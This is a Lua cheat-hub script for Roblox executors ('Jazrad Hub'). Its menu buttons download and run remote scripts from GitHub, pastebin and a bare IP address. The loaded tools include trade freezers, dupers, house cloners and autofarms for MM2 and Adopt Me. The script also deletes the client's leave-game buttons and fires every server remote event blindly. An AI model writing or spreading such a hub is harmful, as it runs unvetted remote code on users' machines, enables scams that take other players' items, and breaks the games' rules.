-------------------------------------------------------
-- SERVICES / PLAYER
-------------------------------------------------------
local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local HttpService = game:GetService("HttpService")
local VirtualUser = game:GetService("VirtualUser")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local CoreGui = game:GetService("CoreGui")

local localPlayer = Players.LocalPlayer

-------------------------------------------------------
-- LOAD WINDUI
-------------------------------------------------------
local WindUI = loadstring(game:HttpGet(
    "https://raw.githubusercontent.com/Footagesus/WindUI/main/dist/main.lua"
))()

-------------------------------------------------------
-- CREATE WINDOW
-------------------------------------------------------
local Window = WindUI:CreateWindow({
    Title = "Library | Jazrad Hub",
    Icon = "laptop",
    Author = "made by Jazrad",
    Folder = "JazradHubLibrary",
    Size = UDim2.fromOffset(520, 420),
    Transparent = true,
    Theme = "Dark",

    -- 👉 ITO YON
    User = {
        Enabled = true,
        Callback = function() end,
        Anonymous = false
    },

    SideBarWidth = 150,
    ScrollBarEnabled = true
})
-------------------------------------------------------
-- REMOVE LEAVE GAME BUTTONS
-------------------------------------------------------
task.spawn(function()
    local function removeLeave(btn)
        if btn and (btn.Name == "LeaveGameButton" or btn.Name == "DontLeaveGameButton") then
            pcall(function() btn:Destroy() end)
        end
    end

    for _, v in ipairs(CoreGui:GetDescendants()) do
        removeLeave(v)
    end

    CoreGui.DescendantAdded:Connect(removeLeave)
end)

-------------------------------------------------------
-- TABS
-------------------------------------------------------
local OtherTab   = Window:Tab({Title = "Other", Icon = "eye"})
local MM2Tab     = Window:Tab({Title = "MM2", Icon = "skull"})
local ADMTab     = Window:Tab({Title = "ADM", Icon = "heart"})
local MiscTab    = Window:Tab({Title = "Misc", Icon = "settings"})
local DiscordTab = Window:Tab({Title = "Discord", Icon = "users"})

-------------------------------------------------------
-- FULL SCRIPT LIST (ORIGINAL – NOT CUT)
-------------------------------------------------------
local Scripts = {
    ["DarkScript Spawner"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/veryimportantrr/x/refs/heads/main/gag_visual.lua"))()', section="Other" },
    ["Ronix Hub"] = { script='loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/b44706178039e9b88c4d768d4d8b012f.lua"))()', section="Other" },
    ["Lunor"] = { script='loadstring(game:HttpGet("https://lunor.dev/loader"))()', section="Other" },
    ["Thunder Z Hub"] = { script="loadstring(game:HttpGet('https://raw.githubusercontent.com/ThundarZ/Welcome/refs/heads/main/Main/GaG/Main.lua'))()", section="Other" },
    ["Quantum Hub (Keyless)"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/flazhy/QuantumOnyx/refs/heads/main/QuantumOnyx.lua"))()', section="Other" },
    ["Limit Hub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/FakeModz/LimitHub/refs/heads/main/LimitHub_Luarmor_E.lua"))()', section="Other" },
    ["Speed Hub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Speed-Hub-X/main/Speed%20Hub%20X.lua",true))()', section="Other" },
    ["All-in-one Script"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Jaradscript/refs/heads/main/jarapd%20script"))()', section="Other" },
    ["ZysumeHub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/ZusumeHub/ZusumeHub/refs/heads/main/UpdateZysume"))()', section="Other" },
    ["Than Hub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/thantzy/thanhub/refs/heads/main/thanv1"))()', section="Other" },
    ["Dupe Remover"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/DupeRemover"))()', section="Other" },
    ["Pet Kg Changer"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/PetWeightchanger"))()', section="Other" },
    ["Freeze Trade"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/Trade%20freeze"))()', section="Other" },
    ["Mooncat Bugger"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/Mooncat"))()', section="Other" },
    ["PVB DUPER"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/pvb%20chrg"))()', section="Other" },

    ["BeeconHub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/BaconBossScript/BeeconHub/main/BeeconHub"))()', section="MM2" },
    ["Inf Snowflakes"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/inffinfnff"))()', section="MM2" },
    ["Radeon Hub"] = { script='loadstring(game:HttpGet("https://pastebin.com/raw/v1LKQGxN",true))()', section="MM2" },
    ["Echelon"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/echelonvanta/Scripts/refs/heads/main/Loader"))()', section="MM2" },

    ["Minigames Autofarm"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/gingigigi"))()', section="ADM" },
    ["GingerBread Farm"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/asczxcee"))()', section="ADM" },
    ["House ClonerV2"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/house%20V2222"))()', section="ADM" },
    ["Instant Hatch | Instant Mega Neon"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/ADOPT%20ME"))()', section="ADM" },
    ["AutoFarm GingerBread"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/ginger%20bread"))()', section="ADM" },
    ["AdoptMe FreezeTrade"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/Trade%20freeze"))()', section="ADM" },
    ["House Cloner"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/copyhouse"))()', section="ADM" },
    ["ProdigyX"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/proidyg"))()', section="ADM" },
    ["AdoptMe JazradHub"] = { script='loadstring(game:HttpGet("https://raw.githubusercontent.com/jazzedd/Scripts/refs/heads/main/ADOPT%20ME"))()', section="ADM" },
    ["MM2 & ADM AutoFarm"] = { script='loadstring(game:HttpGet("http://109.71.240.235:3910/cdn/visual.luau"))()', section="ADM" },
}

local function AddScripts(tab, section)
    for name, data in pairs(Scripts) do
        if data.section == section then
            tab:Button({
                Title = name,
                Icon = "play",
                Callback = function()
                    loadstring(data.script)()
                end
            })
        end
    end
end

AddScripts(OtherTab,"Other")
AddScripts(MM2Tab,"MM2")
AddScripts(ADMTab,"ADM")

-------------------------------------------------------
-- MISC TAB (FULL – NOTHING REMOVED)
-------------------------------------------------------
MiscTab:Paragraph({
    Title = "Miscellaneous Features",
    Desc = "Various helpful utilities",
    Image = "settings",
    Color = "Blue"
})

MiscTab:Dropdown({
    Title = "Theme Switcher",
    Values = {"Dark","Light","Rose"},
    Default = "Dark",
    Callback = function(theme)
        WindUI:SetTheme(theme)
    end
})

MiscTab:Button({
    Title = "Anti AFK",
    Icon = "clock",
    Callback = function()
        localPlayer.Idled:Connect(function()
            VirtualUser:Button2Down(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
            task.wait(1)
            VirtualUser:Button2Up(Vector2.new(0,0), workspace.CurrentCamera.CFrame)
        end)
    end
})

MiscTab:Toggle({
    Title = "Auto Snowball Pug",
    Default = false,
    Callback = function(v)
        getgenv().AutoSnowballPug = v
        if v then
            task.spawn(function()
                while getgenv().AutoSnowballPug do
                    task.wait(0.15)
                    pcall(function()
                        local api = ReplicatedStorage:FindFirstChild("API")
                        if api then
                            for _, r in pairs(api:GetChildren()) do
                                if r:IsA("RemoteEvent") then r:FireServer()
                                elseif r:IsA("RemoteFunction") then r:InvokeServer(true) end
                            end
                        end
                    end)
                end
            end)
        end
    end
})

MiscTab:Button({
    Title = "Make All Pets Mega Neon",
    Icon = "sparkles",
    Callback = function()
        pcall(function()
            local ClientData = require(ReplicatedStorage.ClientModules.Core.ClientData)
            for _, pet in pairs(ClientData.get_data()[tostring(localPlayer)].inventory.pets) do
                pet.properties.mega_neon = true
                pet.properties.rideable = true
                pet.properties.flyable = true
            end
        end)
    end
})

MiscTab:Button({
    Title = "Rejoin Server",
    Icon = "refresh-cw",
    Callback = function()
        TeleportService:TeleportToPlaceInstance(game.PlaceId, game.JobId, localPlayer)
    end
})

MiscTab:Button({
    Title = "Server Hop",
    Icon = "shuffle",
    Callback = function()
        local servers = HttpService:JSONDecode(
            game:HttpGet("https://games.roblox.com/v1/games/"..game.PlaceId.."/servers/Public?limit=100")
        )
        for _, s in pairs(servers.data) do
            if s.playing < s.maxPlayers and s.id ~= game.JobId then
                TeleportService:TeleportToPlaceInstance(game.PlaceId, s.id, localPlayer)
                break
            end
        end
    end
})

MiscTab:Paragraph({
    Title = "Player Info",
    Desc = "Display Name: "..localPlayer.DisplayName..
           "\nUsername: @"..localPlayer.Name..
           "\nUser ID: "..localPlayer.UserId,
    Color = "Green"
})

-------------------------------------------------------
-- DISCORD TAB
-------------------------------------------------------
DiscordTab:Paragraph({
    Title = "Join Our Discord!",
    Desc = "Click the button below to copy the invite link",
    Image = "users",
    Color = "Blue"
})

DiscordTab:Button({
    Title = "Copy Discord Invite",
    Icon = "users",
    Callback = function()
        setclipboard("https://discord.gg/fvWTbRZFTV")
    end
})

-------------------------------------------------------
-- LOADED NOTIFICATION
-------------------------------------------------------
WindUI:Notify({
    Title = "Jazrad Hub Loaded",
    Content = "Everything loaded successfully",
    Icon = "check",
    Duration = 3
})
